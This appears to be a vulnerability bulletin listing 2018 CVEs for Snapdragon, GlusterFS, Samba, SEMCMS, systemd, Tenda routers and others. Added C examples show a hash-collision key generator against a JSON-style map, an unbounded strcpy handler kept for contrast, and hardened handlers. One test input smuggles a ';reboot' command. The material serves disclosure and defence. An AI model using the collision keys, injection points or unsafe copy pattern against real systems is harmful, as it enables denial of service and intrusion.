        Improper input validation leads to buffer overwrite in the WLAN function that handles WMI commands in Snapdragon Mobile in versions SD 835, SD 845, SD 850.
        Published: 2018-10-29 | CVSS: not yet calculated | CVE-2018-11856 | Source: CONFIRM

    qualcomm -- snapdragon
        Improper input validation leads to buffer overwrite in the WLAN function that handles the WLAN roam buffer in Snapdragon Mobile in version SD 845.
        Published: 2018-10-29 | CVSS: not yet calculated | CVE-2018-11873 | Source: CONFIRM

    qualcomm -- snapdragon
        Integer overflow may happen when calculating an internal structure size due to lack of validation of the input length in Snapdragon Mobile, Snapdragon Wear in versions MDM9206, MDM9607, MDM9650, SD 210/SD 212/SD 205, SD 425, SD 427, SD 430, SD 435, SD 450, SD 625, SD 835, SD 845, SD 850, SDA660, SDM429, SDM439, SDM630, SDM632, SDM636, SDM660, SDM710, Snapdragon_High_Med_2016.
        Published: 2018-10-29 | CVSS: not yet calculated | CVE-2018-11865 | Source: CONFIRM

    qualcomm -- snapdragon
        Improper input validation leads to buffer overwrite in the WLAN function that handles WMI commands in Snapdragon Mobile in versions SD 845, SD 850, SDA660.
        Published: 2018-10-29 | CVSS: not yet calculated | CVE-2018-11872 | Source: CONFIRM

    qualcomm -- snapdragon
        Buffer overwrite can happen in a WLAN function while processing the set pdev parameter command due to lack of input validation in Snapdragon Automobile, Snapdragon Mobile, Snapdragon Wear in versions IPQ4019, IPQ8064, IPQ8074, MDM9206, MDM9607, MDM9635M, MDM9640, MDM9650, MSM8996AU, QCA6174A, QCA6564, QCA6574, QCA6574AU, QCA6584, QCA6584AU, QCA9377, QCA9378, QCA9379, QCA9531, QCA9558, QCA9563, QCA9880, QCA9886, QCA9980, SD 210/SD 212/SD 205, SD 425, SD 427, SD 430, SD 435, SD 450, SD 600, SD 625, SD 650/52, SD 820, SD 820A, SD 835, SD 845, SD 850, SDA660, SDM630, SDM632, SDM636, SDM660, SDM710, SDX20, Snapdragon_High_Med_2016.
        Published: 2018-10-29 | CVSS: not yet calculated | CVE-2018-11871 | Source: CONFIRM

    qualcomm -- snapdragon
        Buffer overwrite can occur when the legacy rates count received from the host is not checked against the maximum number of legacy rates in Snapdragon Automobile, Snapdragon Mobile, Snapdragon Wear in versions MDM9206, MDM9607, MDM9635M, MDM9640, MDM9650, MSM8996AU, QCA4531, QCA6174A, QCA6574AU, QCA6584, QCA6584AU, QCA9377, QCA9378, QCA9379, SD 210/SD 212/SD 205, SD 425, SD 600, SD 625, SD 650/52, SD 810, SD 820, SD 820A, SD 835, SD 845, SD 850, SDA660, SDX20.
        Published: 2018-10-29 | CVSS: not yet calculated | CVE-2018-11870 | Source: CONFIRM

    qualcomm -- snapdragon
        Lack of a buffer length check before copying in a WLAN function while processing a FIPS event can lead to a buffer overflow in Snapdragon Mobile in version SD 845.
        Published: 2018-10-29 | CVSS: not yet calculated | CVE-2018-11867 | Source: CONFIRM

    qualcomm -- snapdragon
        Integer overflow may happen in WLAN when calculating an internal structure size due to lack of validation of the input length in Snapdragon Mobile, Snapdragon Wear in versions IPQ8074, MDM9206, MDM9607, MDM9650, SD 210/SD 212/SD 205, SD 425, SD 427, SD 430, SD 435, SD 450, SD 625, SD 835, SD 845, SD 850, SDA660, SDM429, SDM439, SDM630, SDM632, SDM636, SDM660, SDM710, Snapdragon_High_Med_2016.
        Published: 2018-10-29 | CVSS: not yet calculated | CVE-2018-11866 | Source: CONFIRM

    qualcomm -- snapdragon
        When processing the IE set command, buffer overwrite may occur due to lack of input validation of the IE length in Snapdragon Mobile in versions SD 835, SD 845, SD 850.
        Published: 2018-10-29 | CVSS: not yet calculated | CVE-2018-11858 | Source: CONFIRM

    qualcomm -- snapdragon
        Buffer overflow can happen in the WLAN module due to lack of validation of the input length in Snapdragon Mobile in versions SD 845, SD 850, SDA660.
        Published: 2018-10-29 | CVSS: not yet calculated | CVE-2018-11862 | Source: CONFIRM

    qualcomm -- snapdragon
        Buffer overflow can happen in a WLAN function due to lack of validation of the input length in Snapdragon Mobile in versions SD 845, SD 850, SDA660.
        Published: 2018-10-29 | CVSS: not yet calculated | CVE-2018-11861 | Source: CONFIRM

    qualcomm -- snapdragon
        Buffer overwrite can happen in WLAN due to lack of validation of the input length in Snapdragon Mobile in versions SD 845, SD 850.
        Published: 2018-10-29 | CVSS: not yet calculated | CVE-2018-11859 | Source: CONFIRM

    qualcomm -- snapdragon
        Improper input validation in the WLAN encrypt/decrypt module can lead to a buffer copy in Snapdragon Mobile in versions SD 835, SD 845, SD 850.
        Published: 2018-10-29 | CVSS: not yet calculated | CVE-2018-11857 | Source: CONFIRM

    qualcomm -- snapdragon
        Lack of a buffer size check before copying in a WLAN function can lead to a buffer overflow in Snapdragon Mobile in versions SD 845, SD 850.
        Published: 2018-10-29 | CVSS: not yet calculated | CVE-2018-11875 | Source: CONFIRM

    qualcomm -- snapdragon
        Lack of input validation while copying to a buffer in WLAN will lead to a buffer overflow in Snapdragon Mobile in versions SD 835, SD 845, SD 850, SDA660.
        Published: 2018-10-29 | CVSS: not yet calculated | CVE-2018-11876 | Source: CONFIRM

    qualcomm -- snapdragon
        Buffer overflow if the length of the passphrase is more than 32 when setting up a secure NDP connection in Snapdragon Mobile in versions SD 835, SD 845, SD 850, SDA660.
        Published: 2018-10-29 | CVSS: not yet calculated | CVE-2018-11874 | Source: CONFIRM

    qualcomm -- snapdragon
        Incorrect bound check can lead to potential buffer overwrite in the WLAN controller in Snapdragon Mobile in versions SD 835, SD 845, SD 850, SDA660.
        Published: 2018-10-29 | CVSS: not yet calculated | CVE-2018-11882 | Source: CONFIRM

    qualcomm -- snapdragon
        When the buffer length passed is very large, the bounds check could be bypassed, leading to potential buffer overwrite in Snapdragon Mobile in version SD 845.
        Published: 2018-10-29 | CVSS: not yet calculated | CVE-2018-11879 | Source: CONFIRM

    qualcomm -- snapdragon
        Improper input validation leads to buffer overflow while processing the network list offload command in a WLAN function in Snapdragon Mobile in versions SD 835, SD 845, SD 850, SDA660.
        Published: 2018-10-29 | CVSS: not yet calculated | CVE-2018-11884 | Source: CONFIRM

    qualcomm -- snapdragon
        Incorrect bound check can lead to potential buffer overwrite in a WLAN function in Snapdragon Mobile in versions SD 835, SD 845, SD 850, SDA660.
        Published: 2018-10-29 | CVSS: not yet calculated | CVE-2018-11880 | Source: CONFIRM

    qualcomm -- snapdragon
        When the buffer length passed is very large in WLAN, the bounds check could be bypassed, leading to potential buffer overwrite in Snapdragon Mobile in versions SD 835, SD 845, SD 850, SDA660.
        Published: 2018-10-29 | CVSS: not yet calculated | CVE-2018-11877 | Source: CONFIRM

    qualcomm -- snapdragon
        A micro-core of QMP transportation may cause a macro-core to read from or write to arbitrary memory in Snapdragon Mobile in versions SD 845, SD 850.
        Published: 2018-10-26 | CVSS: not yet calculated | CVE-2017-18309 | Sources: SECTRACK, CONFIRM

    qualcomm -- snapdragon
        A bool variable in a Video function, which gets typecast to int before being read, could result in an out-of-bounds read access in all Android releases from CAF using the Linux kernel.
        Published: 2018-10-29 | CVSS: not yet calculated | CVE-2017-18281 | Sources: SECTRACK, CONFIRM

    qualcomm -- snapdragon
        Modem segments are unlocked after authentication, leaving modem segments open to all in Snapdragon Mobile, Snapdragon Wear in versions MDM9607, MSM8909W, SD 210/SD 212/SD 205, SD 425, SD 430.
        Published: 2018-10-26 | CVSS: not yet calculated | CVE-2017-18308 | Sources: SECTRACK, CONFIRM

    qualcomm -- snapdragon
        ClientEnv exposes services 0-32 to HLOS in Snapdragon Automobile, Snapdragon Mobile, Snapdragon Wear in versions MSM8909W, MSM8996AU, SD 210/SD 212/SD 205, SD 410/12, SD 425, SD 427, SD 430, SD 435, SD 450, SD 615/16/SD 415, SD 617, SD 625, SD 650/52, SD 810, SD 820, SD 820A, SD 835, SD 845, SDA660, SDM429, SDM439, SDM630, SDM632, SDM636, SDM660, Snapdragon_High_Med_2016.
        Published: 2018-10-26 | CVSS: not yet calculated | CVE-2017-18310 | Sources: SECTRACK, CONFIRM

    qualcomm -- snapdragon
        When a series of FDAL messages is sent to the modem, a Use After Free condition can occur in Snapdragon Automobile, Snapdragon Mobile, Snapdragon Wear in versions MDM9206, MDM9607, MDM9640, MDM9650, MSM8909W, MSM8996AU, SD 210/SD 212/SD 205, SD 425, SD 430, SD 450, SD 615/16/SD 415, SD 617, SD 625, SD 650/52, SD 820, SD 820A, SD 835, SD 845, SDA660, SDX20.
        Published: 2018-10-26 | CVSS: not yet calculated | CVE-2018-11305 | Sources: SECTRACK, CONFIRM

    redhat -- cloudforms_management_engine
        A code injection flaw was found in the way capacity and utilization imported control files are processed. A remote, authenticated attacker with access to the capacity and utilization feature could use this flaw to execute arbitrary code as the user CFME runs as.
        Published: 2018-10-31 | CVSS: not yet calculated | CVE-2016-5402 | Sources: REDHAT, BID, CONFIRM

    redhat -- glusterfs
        It was found that the use of the snprintf function in the features/locks translator of glusterfs server 3.8.4, as shipped with Red Hat Gluster Storage, was vulnerable to a format string attack. A remote, authenticated attacker could use this flaw to cause a remote denial of service.
        Published: 2018-10-31 | CVSS: not yet calculated | CVE-2018-14661 | Sources: REDHAT, REDHAT, CONFIRM

    redhat -- glusterfs
        A flaw was found in glusterfs server through versions 4.1.4 and 3.1.2 which allowed repeated use of the GF_META_LOCK_KEY xattr. A remote, authenticated attacker could use this flaw to create multiple locks for a single inode by calling setxattr repeatedly, resulting in memory exhaustion of the glusterfs server node.
        Published: 2018-11-01 | CVSS: not yet calculated | CVE-2018-14660 | Sources: REDHAT, REDHAT, CONFIRM

    redhat -- glusterfs
        The Gluster file system through versions 4.1.4 and 3.1.2 is vulnerable to a denial of service attack via use of the 'GF_XATTR_IOSTATS_DUMP_KEY' xattr. A remote, authenticated attacker could exploit this by mounting a Gluster volume and repeatedly calling 'setxattr(2)' to trigger a state dump and create an arbitrary number of files in the server's runtime directory.
        Published: 2018-10-31 | CVSS: not yet calculated | CVE-2018-14659 | Sources: REDHAT, REDHAT, CONFIRM

    redhat -- glusterfs
        The Gluster file system through versions 3.12 and 4.1.4 is vulnerable to a buffer overflow in the 'features/index' translator via the code handling the 'GF_XATTR_CLRLK_CMD' xattr in the 'pl_getxattr' function. A remote authenticated attacker could exploit this on a mounted volume to cause a denial of service.
        Published: 2018-10-31 | CVSS: not yet calculated | CVE-2018-14652 | Sources: REDHAT, REDHAT, CONFIRM

    redhat -- glusterfs
        The Gluster file system through version 4.1.4 is vulnerable to abuse of the 'features/index' translator. A remote attacker with access to mount volumes could exploit this via the 'GF_XATTROP_ENTRY_IN_KEY' xattrop to create arbitrary, empty files on the target server.
        Published: 2018-10-31 | CVSS: not yet calculated | CVE-2018-14654 | Sources: REDHAT, REDHAT, CONFIRM

    redhat -- glusterfs
        The Gluster file system through versions 4.1.4 and 3.12 is vulnerable to a heap-based buffer overflow in the '__server_getspec' function via the 'gf_getspec_req' RPC message. A remote authenticated attacker could exploit this to cause a denial of service or other potential unspecified impact.
        Published: 2018-10-31 | CVSS: not yet calculated | CVE-2018-14653 | Sources: REDHAT, REDHAT, CONFIRM

    redhat -- glusterfs
        It was found that the fix for CVE-2018-10927, CVE-2018-10928, CVE-2018-10929, CVE-2018-10930, and CVE-2018-10926 was incomplete. A remote, authenticated attacker could use one of these flaws to execute arbitrary code, create arbitrary files, or cause denial of service on glusterfs server nodes via symlinks to relative paths.
        Published: 2018-10-31 | CVSS: not yet calculated | CVE-2018-14651 | Sources: REDHAT, REDHAT, CONFIRM

    redhat -- openstack_platform
        A permissions flaw was found in redis, which sets weak permissions on certain files and directories that could potentially contain sensitive information. A local, unprivileged user could possibly use this flaw to access unauthorized system information.
        Published: 2018-10-31 | CVSS: not yet calculated | CVE-2016-2121 | Sources: BID, REDHAT, CONFIRM

    ruby -- loofah_gem
        In the Loofah gem for Ruby, through v2.2.2, unsanitized JavaScript may occur in sanitized output when a crafted SVG element is republished.
        Published: 2018-10-30 | CVSS: not yet calculated | CVE-2018-16468 | Source: MISC

    s-cms -- s-cms
        S-CMS PHP 1.0 has SQL injection in member/member_news.php via the type parameter (aka the $N_type field).
        Published: 2018-10-31 | CVSS: not yet calculated | CVE-2018-18887 | Source: MISC

    samba -- samba
        It was found that Samba before versions 4.5.3, 4.4.8, and 4.3.13 always requested forwardable tickets when using Kerberos authentication. A service to which Samba authenticated using Kerberos could subsequently use the ticket to impersonate Samba to other services or domain users.
        Published: 2018-10-31 | CVSS: not yet calculated | CVE-2016-2125 | Sources: REDHAT, REDHAT, REDHAT, REDHAT, BID, SECTRACK, REDHAT, CONFIRM, CONFIRM

    samba -- samba
        A flaw was found in Samba versions 4.0.0 to 4.5.2. The Samba routine ndr_pull_dnsp_name contains an integer wrap problem, leading to an attacker-controlled memory overwrite. ndr_pull_dnsp_name parses data from the Samba Active Directory ldb database. Any user who can write to the dnsRecord attribute over LDAP can trigger this memory corruption. By default, all authenticated LDAP users can write to the dnsRecord attribute on new DNS objects. This makes the defect a remote privilege escalation.
        Published: 2018-11-01 | CVSS: not yet calculated | CVE-2016-2123 | Sources: BID, SECTRACK, CONFIRM, CONFIRM

    sandboxie -- sandboxie
        Sandboxie 5.26 allows a Sandbox Escape via an "import os" statement, followed by os.system("cmd") or os.system("powershell"), within a .py file.
        Published: 2018-10-29 | CVSS: not yet calculated | CVE-2018-18748 | Source: MISC

    schneider_electric -- modicon_m221
        An Insufficient Verification of Data Authenticity (CWE-345) vulnerability exists in the Modicon M221, all versions, which could cause a change of the IPv4 configuration (IP address, mask and gateway) when remotely connected to the device.
        Published: 2018-11-02 | CVSS: not yet calculated | CVE-2018-7798 | Source: CONFIRM

    schneider_electric -- schneider_electric_software_update
        A DLL hijacking vulnerability exists in Schneider Electric Software Update (SESU), all versions prior to V2.2.0, which could allow an attacker to execute arbitrary code on the targeted system by placing a specific DLL file.
        Published: 2018-11-02 | CVSS: not yet calculated | CVE-2018-7799 | Sources: MISC, CONFIRM

    semcms -- semcms
        XSS was discovered in SEMCMS PHP V3.4 via the SEMCMS_SeoAndTag.php?Class=edit&CF=SeoAndTag tag_indexkey parameter.
        Published: 2018-10-30 | CVSS: not yet calculated | CVE-2018-18841 | Source: MISC

    semcms -- semcms
        An XSS issue was discovered in SEMCMS 3.4 via the first input field of the admin/SEMCMS_Link.php?lgid=1 URI.
        Published: 2018-10-29 | CVSS: not yet calculated | CVE-2018-18740 | Source: MISC

    semcms -- semcms
        An XSS issue was discovered in SEMCMS 3.4 via the second text field of the admin/SEMCMS_Categories.php?pid=1&lgid=1 URI.
        Published: 2018-10-29 | CVSS: not yet calculated | CVE-2018-18743 | Source: MISC

    semcms -- semcms
        An XSS issue was discovered in SEMCMS 3.4 via the fifth text box of the admin/SEMCMS_Main.php URI.
        Published: 2018-10-29 | CVSS: not yet calculated | CVE-2018-18744 | Source: MISC

    semcms -- semcms
        An XSS issue was discovered in SEMCMS 3.4 via admin/SEMCMS_Menu.php?lgid=1 during editing.
        Published: 2018-10-29 | CVSS: not yet calculated | CVE-2018-18745 | Source: MISC

    semcms -- semcms
        An XSS issue was discovered in SEMCMS 3.4 via admin/SEMCMS_Download.php?lgid=1 during editing.
        Published: 2018-10-29 | CVSS: not yet calculated | CVE-2018-18741 | Source: MISC

    semcms -- semcms
        An XSS issue was discovered in SEMCMS 3.4 via the admin/SEMCMS_Products.php?lgid=1 Keywords field.
        Published: 2018-10-29 | CVSS: not yet calculated | CVE-2018-18739 | Source: MISC

    semcms -- semcms
        A CSRF issue was discovered in SEMCMS 3.4 via the admin/SEMCMS_User.php?Class=add&CF=user URI.
        Published: 2018-10-29 | CVSS: not yet calculated | CVE-2018-18742 | Source: MISC

    semcms -- semcms
        XSS was discovered in SEMCMS V3.4 via the semcms_remail.php?type=ok umail parameter.
        Published: 2018-10-29 | CVSS: not yet calculated | CVE-2018-18783 | Source: MISC

    semcms -- semcms
        XSS was discovered in SEMCMS PHP V3.4 via the SEMCMS_SeoAndTag.php?Class=edit&CF=SeoAndTag tag_indexmetatit parameter.
        Published: 2018-10-30 | CVSS: not yet calculated | CVE-2018-18840 | Source: MISC

    semcms -- semcms
        An XSS issue was discovered in SEMCMS 3.4 via the admin/SEMCMS_Categories.php?pid=1&lgid=1 category_key parameter.
        Published: 2018-10-29 | CVSS: not yet calculated | CVE-2018-18738 | Source: MISC

    spray-json -- spray-json
        Lightbend Spray spray-json through 1.3.4 allows remote attackers to cause a denial of service (resource consumption) because of algorithmic complexity during the parsing of many JSON object fields with keys that have the same hash code.
        Published: 2018-10-31 | CVSS: not yet calculated | CVE-2018-18854 | Source: MISC

    spray-json -- spray-json
        Lightbend Spray spray-json through 1.3.4 allows remote attackers to cause a denial of service (resource consumption) because of algorithmic complexity during the parsing of a field composed of many decimal digits.
        Published: 2018-10-31 | CVSS: not yet calculated | CVE-2018-18853 | Source: MISC
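The first spray-json entry above is an algorithmic-complexity attack on the map a JSON parser builds from an object's fields. The program below is an added model of that mechanism in C (the language used for the other examples on this page), not spray-json or Scala code: it reproduces java.lang.String.hashCode, which Scala strings inherit, generates 2^k distinct keys that all share one hash code from the colliding pair "Aa"/"BB", and counts the comparisons a constructed chained hash map spends inserting them, against the cost of ordinary keys. The map itself is a stand-in and is not how spray-json stores fields.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* java.lang.String.hashCode, which Scala strings inherit:
 * h = 31*h + c over the UTF-16 code units (plain ASCII here). */
int32_t java_string_hash(const char *s)
{
    uint32_t h = 0;
    for (; *s; s++)
        h = 31u * h + (unsigned char)*s;
    return (int32_t)h;
}

/* "Aa" and "BB" both hash to 2112, and hashCode composes under
 * concatenation, so every string made of k such blocks collides too.
 * Fills keys[0 .. 2^k) with distinct colliding keys of length 2k. */
void gen_colliding_keys(int k, char **keys)
{
    static const char *block[2] = { "Aa", "BB" };
    int n = 1 << k;
    for (int i = 0; i < n; i++) {
        keys[i] = calloc(2 * (size_t)k + 1, 1);
        for (int b = 0; b < k; b++)
            strcat(keys[i], block[(i >> b) & 1]);
    }
}

/* Toy chained hash map (constructed) standing in for the map a JSON
 * parser fills with an object's fields. */
#define NBUCKETS 1024
typedef struct node { const char *key; struct node *next; } node;

/* Insert n distinct keys into an empty map and return how many key
 * comparisons the duplicate check cost. Colliding hashes put every key in
 * one chain, so insert i walks i nodes and the total is n(n-1)/2. */
long insert_cost(char **keys, int n)
{
    node *buckets[NBUCKETS] = { 0 };
    long cmp = 0;
    for (int i = 0; i < n; i++) {
        uint32_t b = (uint32_t)java_string_hash(keys[i]) % NBUCKETS;
        for (node *p = buckets[b]; p; p = p->next) {
            cmp++;
            if (strcmp(p->key, keys[i]) == 0)
                break;
        }
        node *nd = malloc(sizeof *nd);
        nd->key = keys[i];
        nd->next = buckets[b];
        buckets[b] = nd;
    }
    for (int b = 0; b < NBUCKETS; b++)
        for (node *p = buckets[b]; p;) { node *q = p->next; free(p); p = q; }
    return cmp;
}

static void free_keys(char **keys, int n)
{
    for (int i = 0; i < n; i++) free(keys[i]);
    free(keys);
}

/* Cost of inserting the attacker's 2^k colliding field names. */
long colliding_cost(int k)
{
    int n = 1 << k;
    char **keys = malloc((size_t)n * sizeof *keys);
    gen_colliding_keys(k, keys);
    long c = insert_cost(keys, n);
    free_keys(keys, n);
    return c;
}

/* Cost of inserting n ordinary field names "f0", "f1", ... */
long distinct_cost(int n)
{
    char **keys = malloc((size_t)n * sizeof *keys);
    for (int i = 0; i < n; i++) {
        keys[i] = malloc(16);
        snprintf(keys[i], 16, "f%d", i);
    }
    long c = insert_cost(keys, n);
    free_keys(keys, n);
    return c;
}

/* 1 if all 2^k generated keys share a single hash code. */
int all_collide(int k)
{
    int n = 1 << k, ok = 1;
    char **keys = malloc((size_t)n * sizeof *keys);
    gen_colliding_keys(k, keys);
    for (int i = 1; i < n; i++)
        if (java_string_hash(keys[i]) != java_string_hash(keys[0]))
            ok = 0;
    free_keys(keys, n);
    return ok;
}

int main(void)
{
    printf("256 colliding keys: %ld comparisons\n", colliding_cost(8));
    printf("256 distinct keys:  %ld comparisons\n", distinct_cost(256));
    return 0;
}
```

With 256 colliding keys the duplicate check costs 256*255/2 = 32640 comparisons; the attacker picks k, so the cost grows quadratically in the size of the request. The usual mitigations are a per-process randomized hash seed, a cap on the number of fields an object may carry, or a map that degrades to a balanced tree rather than a list on collision.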
    synology -- diskstation_manager
        Information exposure vulnerability in SYNO.Core.ACL in Synology DiskStation Manager (DSM) before 6.2-23739-2 allows remote authenticated users to determine the existence and obtain the metadata of arbitrary files via the file_path parameter.
        Published: 2018-10-31 | CVSS: not yet calculated | CVE-2018-13281 | Source: CONFIRM

    synology -- photo_station
        Session fixation vulnerability in SYNO.PhotoStation.Auth in Synology Photo Station before 6.8.7-3481 allows remote attackers to hijack web sessions via the PHPSESSID parameter.
        Published: 2018-10-31 | CVSS: not yet calculated | CVE-2018-13282 | Source: CONFIRM

    systemd -- systemd
        A vulnerability in unit_deserialize of systemd allows an attacker to supply arbitrary state across systemd re-execution via NotifyAccess. This can be used to improperly influence systemd execution and possibly lead to root privilege escalation. Affected releases are systemd versions up to and including 239.
        Published: 2018-10-26 | CVSS: not yet calculated | CVE-2018-15686 | Sources: BID, MISC, GENTOO, EXPLOIT-DB

    systemd -- systemd
        A race condition in chown_one() of systemd allows an attacker to cause systemd to set arbitrary permissions on arbitrary files. Affected releases are systemd versions up to and including 239.
        Published: 2018-10-26 | CVSS: not yet calculated | CVE-2018-15687 | Sources: BID, MISC, GENTOO, EXPLOIT-DB

    systemd -- systemd
        A buffer overflow vulnerability in the dhcp6 client of systemd allows a malicious dhcp6 server to overwrite heap memory in systemd-networkd. Affected releases are systemd versions up to and including 239.
        Published: 2018-10-26 | CVSS: not yet calculated | CVE-2018-15688 | Sources: BID, MISC, GENTOO

    tecrail -- responsive_filemanager
        An SSRF issue was discovered in tecrail Responsive FileManager 9.13.4 via the upload.php url parameter. NOTE: this issue exists because of an incomplete fix for CVE-2018-15495.
        Published: 2018-10-31 | CVSS: not yet calculated | CVE-2018-18867 | Source: MISC

    tenda -- multiple_products
        An issue was discovered on Tenda AC9 V15.03.05.19(6318)_CN, AC15 V15.03.05.19_CN, and AC18 V15.03.05.19(6318)_CN devices. They allow remote code execution via shell metacharacters in the usbName field of a POST request to the __fastcall function.
        Published: 2018-10-29 | CVSS: not yet calculated | CVE-2018-18728 | Source: MISC

    tenda -- multiple_products
        An issue was discovered on Tenda AC7 V15.03.06.44_CN, AC9 V15.03.05.19(6318)_CN, AC10 V15.03.06.23_CN, AC15 V15.03.05.19_CN, and AC18 V15.03.05.19(6318)_CN devices. There is a buffer overflow vulnerability in the router's web server, httpd. When processing the "firewallEn" parameter of a POST request, the value is passed directly to strcpy into a local stack buffer, overwriting the function's return address.
        Published: 2018-10-29 | CVSS: not yet calculated | CVE-2018-18709 | Source: MISC

    tenda -- multiple_products
        An issue was discovered on Tenda AC7 V15.03.06.44_CN, AC9 V15.03.05.19(6318)_CN, AC10 V15.03.06.23_CN, AC15 V15.03.05.19_CN, and AC18 V15.03.05.19(6318)_CN devices. There is a buffer overflow vulnerability in the router's web server, httpd. When processing the 'ntpServer' parameter of a POST request, the value is passed directly to strcpy into a local stack buffer, overwriting the function's return address.
        Published: 2018-10-29 | CVSS: not yet calculated | CVE-2018-18732 | Source: MISC

    tenda -- multiple_products
        An issue was discovered on Tenda AC7 V15.03.06.44_CN, AC9 V15.03.05.19(6318)_CN, AC10 V15.03.06.23_CN, AC15 V15.03.05.19_CN, and AC18 V15.03.05.19(6318)_CN devices. There is a buffer overflow vulnerability in the router's web server, httpd. When processing the 'deviceMac' parameter of a POST request, the value is passed directly to sprintf into a local stack buffer, overwriting the function's return address.
        Published: 2018-10-29 | CVSS: not yet calculated | CVE-2018-18731 | Source: MISC

    tenda -- multiple_products
        An issue was discovered on Tenda AC7 V15.03.06.44_CN, AC9 V15.03.05.19(6318)_CN, AC10 V15.03.06.23_CN, AC15 V15.03.05.19_CN, and AC18 V15.03.05.19(6318)_CN devices. There is a buffer overflow vulnerability in the router's web server, httpd. When processing the 'startIp' and 'endIp' parameters of a POST request, each value is passed directly to sprintf into a local stack buffer, overwriting the function's return address.
        Published: 2018-10-29 | CVSS: not yet calculated | CVE-2018-18730 | Source: MISC

    tenda -- multiple_products
        An issue was discovered on Tenda AC7 V15.03.06.44_CN, AC9 V15.03.05.19(6318)_CN, AC10 V15.03.06.23_CN, AC15 V15.03.05.19_CN, and AC18 V15.03.05.19(6318)_CN devices. There is a heap-based buffer overflow vulnerability in the router's web server, httpd. When processing the 'mac' parameter of a POST request, the value is passed directly to strcpy into a heap buffer, which can leak sensitive information or even hijack program control flow.
        Published: 2018-10-29 | CVSS: not yet calculated | CVE-2018-18729 | Source: MISC

    tenda -- multiple_products
        An issue was discovered on Tenda AC7 V15.03.06.44_CN, AC9 V15.03.05.19(6318)_CN, AC10 V15.03.06.23_CN, AC15 V15.03.05.19_CN, and AC18 V15.03.05.19(6318)_CN devices. There is a buffer overflow vulnerability in the router's web server, httpd. When processing the "page" parameter of the function "fromDhcpListClient", the value is passed directly to sprintf into a local stack buffer, overwriting the function's return address.
        Published: 2018-10-29 | CVSS: not yet calculated | CVE-2018-18706 | Source: MISC

    tenda -- multiple_products
        An issue was discovered on Tenda AC7 V15.03.06.44_CN, AC9 V15.03.05.19(6318)_CN, AC10 V15.03.06.23_CN, AC15 V15.03.05.19_CN, and AC18 V15.03.05.19(6318)_CN devices. There is a buffer overflow vulnerability in the router's web server, httpd. When processing the "ssid" parameter of a POST request, the value is passed directly to strcpy into a local stack buffer, overwriting the function's return address.
        Published: 2018-10-29 | CVSS: not yet calculated | CVE-2018-18707 | Source: MISC

    tenda -- multiple_products
        An issue was discovered on Tenda AC7 V15.03.06.44_CN, AC9 V15.03.05.19(6318)_CN, AC10 V15.03.06.23_CN, AC15 V15.03.05.19_CN, and AC18 V15.03.05.19(6318)_CN devices. There is a buffer overflow vulnerability in the router's web server, httpd. When processing the "page" parameter of the function "fromAddressNat" in a POST request, the value is passed directly to sprintf into a local stack buffer, overwriting the function's return address.
        Published: 2018-10-29 | CVSS: not yet calculated | CVE-2018-18708 | Source: MISC

    tenda -- multiple_products
        An issue was discovered on Tenda AC7 V15.03.06.44_CN, AC9 V15.03.05.19(6318)_CN, AC10 V15.03.06.23_CN, AC15 V15.03.05.19_CN, and AC18 V15.03.05.19(6318)_CN devices. There is a buffer overflow vulnerability in the router's web server, httpd. When processing the 'deviceList' parameter of a POST request, the value is passed directly to strcpy into a local stack buffer, overwriting the function's return address.
        Published: 2018-10-29 | CVSS: not yet calculated | CVE-2018-18727 | Source: MISC
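Nine of the Tenda entries above describe the same defect: a POST parameter copied with strcpy or sprintf into a fixed-size stack buffer. The C below is an added example, not Tenda firmware; the buffer sizes, the 32-byte SSID limit and the MAC-address format are assumptions. It places the unbounded copy the advisories describe next to handlers that measure the input, validate its shape, bound the copy, and treat snprintf truncation as an error instead of silently cutting the value.

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>

/*
 * Constructed example, not Tenda firmware: a toy httpd parameter handler
 * written the way the advisories describe the real one, beside hardened
 * versions. Buffer sizes and parameter formats are assumptions.
 */

#define SSID_MAX 32          /* 802.11 SSIDs are at most 32 bytes */

/* Vulnerable pattern: the POST value lands in a fixed stack buffer via
 * strcpy with no length check, so a value longer than the buffer overwrites
 * the saved return address. Kept only for contrast; calling it with a long
 * attacker-controlled value is undefined behaviour. */
void set_ssid_unsafe(const char *value)
{
    char ssid[SSID_MAX + 1];
    strcpy(ssid, value);                       /* unbounded copy */
    printf("ssid set to %s\n", ssid);
}

/* Hardened: scan at most SSID_MAX + 1 bytes, reject anything that does not
 * fit, copy with an explicit bound and NUL-terminate. out must have room
 * for SSID_MAX + 1 bytes. Returns 0 on success, -1 if rejected. */
int set_ssid_safe(const char *value, char *out)
{
    size_t n = 0;
    while (n <= SSID_MAX && value[n] != '\0')
        n++;
    if (n == 0 || n > SSID_MAX)
        return -1;
    memcpy(out, value, n);
    out[n] = '\0';
    return 0;
}

/* The deviceMac / startIp / endIp entries use sprintf into a stack buffer.
 * Hardened form: check that the input has the shape of a MAC address
 * (17 characters, hex pairs separated by colons), then format with snprintf
 * and treat truncation as an error. Returns 0 on success, -1 otherwise. */
int format_mac_rule(const char *mac, char *out, size_t outlen)
{
    if (strlen(mac) != 17)
        return -1;
    for (int i = 0; i < 17; i++) {
        if (i % 3 == 2) {
            if (mac[i] != ':')
                return -1;
        } else if (!isxdigit((unsigned char)mac[i])) {
            return -1;
        }
    }
    int w = snprintf(out, outlen, "mac=%s", mac);
    if (w < 0 || (size_t)w >= outlen)
        return -1;                              /* would have been truncated */
    return 0;
}

/* Constructed inputs exercised by main() and the tests: 1 if every hardened
 * call behaves as intended, 0 otherwise. */
int demo_checks(void)
{
    char out[SSID_MAX + 1], rule[32], longval[64];
    memset(longval, 'A', sizeof longval - 1);
    longval[sizeof longval - 1] = '\0';        /* 63 bytes, as a POST could carry */

    if (set_ssid_safe("corp-wifi", out) != 0 || strcmp(out, "corp-wifi") != 0) return 0;
    if (set_ssid_safe(longval, out) != -1) return 0;
    if (set_ssid_safe("", out) != -1) return 0;
    if (format_mac_rule("00:11:22:aa:bb:cc", rule, sizeof rule) != 0) return 0;
    if (strcmp(rule, "mac=00:11:22:aa:bb:cc") != 0) return 0;
    if (format_mac_rule("00:11:22:aa:bb:cc;reboot", rule, sizeof rule) != -1) return 0;
    if (format_mac_rule("00:11:22:aa:bb:cc", rule, 8) != -1) return 0;   /* too small */
    return 1;
}

int main(void)
{
    printf("hardened handlers behave as intended: %d\n", demo_checks());
    return 0;
}
```

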